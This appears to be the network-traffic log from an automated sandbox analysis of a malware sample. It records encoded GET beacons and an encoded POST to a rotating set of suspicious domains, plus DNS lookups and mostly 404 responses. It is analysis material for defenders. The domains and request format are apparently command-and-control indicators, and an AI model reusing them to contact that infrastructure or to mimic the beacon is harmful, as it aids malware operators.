                Source: global trafficHTTP traffic detected: GET /sgdd/?lJoLl=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZBzCxFQdAjqxC7xOHDVFXExJKDlpbRou5GO9qXsjFJuvZOA==&QjtpF=dVl4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.laohub10.netConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /rq1s/?lJoLl=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpFmKQ5u25OjPKezpJaRyWkNAYPVqp8tLi0/EjJnnGVWea/Pg==&QjtpF=dVl4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.xcvbj.asiaConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /rum2/?lJoLl=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygB0ycck8sQYGv47r23Pk1HFbXKeUzp9pERW5uePswFB8aOdg==&QjtpF=dVl4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.soainsaat.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /d9ku/?QjtpF=dVl4&lJoLl=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94ZsfikbXdLyEshcSDsVMvwPhhK/JQDE9yK/18FWBwj6urmQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.amayavp.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /vg0z/?lJoLl=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTV7XKjeUdTVBJpjyjUmzrS97fQKKFffie2isBox+1pqpQFw==&QjtpF=dVl4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.vayui.topConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /o362/?QjtpF=dVl4&lJoLl=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqQkrWzQaEMmYHbjlB+9nxdj865RiOaXPy8R35WRqg9vUq/A== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.rgenerousrs.storeConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /jhb8/?lJoLl=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmvnYE4/ya8ROpqJGzP2nxEXACS10Z064kir5KyXbYyrXZl7w==&QjtpF=dVl4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.t91rl7.proConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficDNS traffic detected: DNS query: www.nb-shenshi.buzz
                Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
                Source: global trafficDNS traffic detected: DNS query: www.xcvbj.asia
                Source: global trafficDNS traffic detected: DNS query: www.soainsaat.xyz
                Source: global trafficDNS traffic detected: DNS query: www.amayavp.xyz
                Source: global trafficDNS traffic detected: DNS query: www.vayui.top
                Source: global trafficDNS traffic detected: DNS query: www.rgenerousrs.store
                Source: global trafficDNS traffic detected: DNS query: www.t91rl7.pro
                Source: global trafficDNS traffic detected: DNS query: www.learnwithus.site
                Source: unknownHTTP traffic detected: POST /sgdd/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-USHost: www.laohub10.netOrigin: http://www.laohub10.netReferer: http://www.laohub10.net/sgdd/Cache-Control: no-cacheContent-Length: 206Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 MobileData Raw: 6c 4a 6f 4c 6c 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 65 49 37 52 5a 46 52 38 39 74 6b 4f 66 6c 37 49 6b 79 33 52 2f 6d 44 35 2f 75 48 6c 59 68 65 59 48 46 5a 56 50 77 67 3d Data Ascii: lJoLl=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLeI7RZFR89tkOfl7Iky3R/mD5/uHlYheYHFZVPwg=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 08:27:56 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 28 Nov 2024 08:29:14 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-11-28T08:29:19.3336265Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 08:29:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EU950W7EQb8JR2Zn%2FMLc5cuT1O1VexGEd06cGKaA2XrSDOkgNUCicPAo1BiG4mI0%2BoV4MubgRvpf9p%2F0WjbG2gA%2BSnatry40atfgwoAoYwvzF%2BMqPkUYaRXEDZ5HMDUt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e98fdbf1c4d5e6b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=744&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 08:29:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UOR1hL3EPHCEeFGzVJzHNT2zkviWju%2B6ODP%2BSbGav4RR7CTiDjgTLFBJhJ0h691rsO10yTpvkKakS1b%2FRN%2FqN1HiCSq4VcZsbox9M2lTgijwRffdEv%2Fa92P8Ofo0r16n"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e98fdcff8984269-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1623&rtt_var=811&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=764&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 08:29:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YCNBgNMa1jlQs6JPfGOmzxrYQTfvhqW41SkOInvAuSIHPQLQPnHOc9oyd3D3Yp5A2VqlWNJAKRoUWVXc%2BWZOSWpQ2%2BrjI2qGMkelBAS70Doh7DuSdW9uiW1dlYqqUDVO"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e98fde05ecd7ce7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1945&min_rtt=1945&rtt_var=972&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1781&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 08:29:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y6RuzF6EvmhWGjCj0Tqp2rwXGXnJRgm8i%2F19hHUK0i%2FLRQf0zl4wfy5m%2BPCbQgdGugM9z5EMIT7FsUU3b8LoRXvPOxe1qouVKlC%2Fg%2FxO%2BXIOX9A0pSxChDY%2FavBYdcjw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e98fdf17bbb437e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1683&rtt_var=841&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=489&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 08:29:51 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jqr653oZlxDmzOM9O8GRPnOC77NsMhOEJVABUIKPEe%2F8hKZEXk0j14NL9eQ14wEVEIqQ3ruwQrcz8EWL%2Bx2YxV9KW7yQdwhoFQmRLZRgMsxmTHSozHkYcM1WN6FDL3NbWPQi60faqko%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e98fe1bcda52394-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1922&min_rtt=1922&rtt_var=961&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=768&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 08:29:54 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fRBg2sYtXNbex%2FiDTTrCNVEdXuE1OXsxiYxI2v0RByyaiFjzQy4X3cZXuZsgpQs6YCnokfbttmq%2FMtemQy%2BKtVh0lNoZYHeJhzVpHlkc9WfAjXQGT3RokKTGEE16bx0C1MsinpFgf%2Bo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e98fe2c7c9c8c0f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1767&rtt_var=883&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=788&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 08:29:56 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZPWEXmc5iHuUIWiSZICRcbRO5HXZEUWtYG1yI3qALfcRNuN26IBJodUb7tNSStHV2VH43kDkrY24YRt%2BVVd2QqHg0%2Bv3ONSaEtHX%2FD%2BnRNGjjBQeAnrLBCavqZ8Pqd1ES5a3KWIJ2ds%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e98fe3c8c31c335-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1472&min_rtt=1472&rtt_var=736&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1805&delivery_rate=0&cwnd=163&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 08:29:59 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q%2BbwOWJD%2F2G4ECvezZR4l31%2FBue3KvF7RFF5oghKdGkhxm1ooxZUdTJN20e3yRn6kcu2kY7CnkR00XxT4XZPBDVm38JPBFQeMc8Eh1wXY6d3bUjD%2BIvwvgQaON9cU0pt8lIXgxer%2BnM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e98fe4d6a6141e3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1574&rtt_var=787&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=497&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data 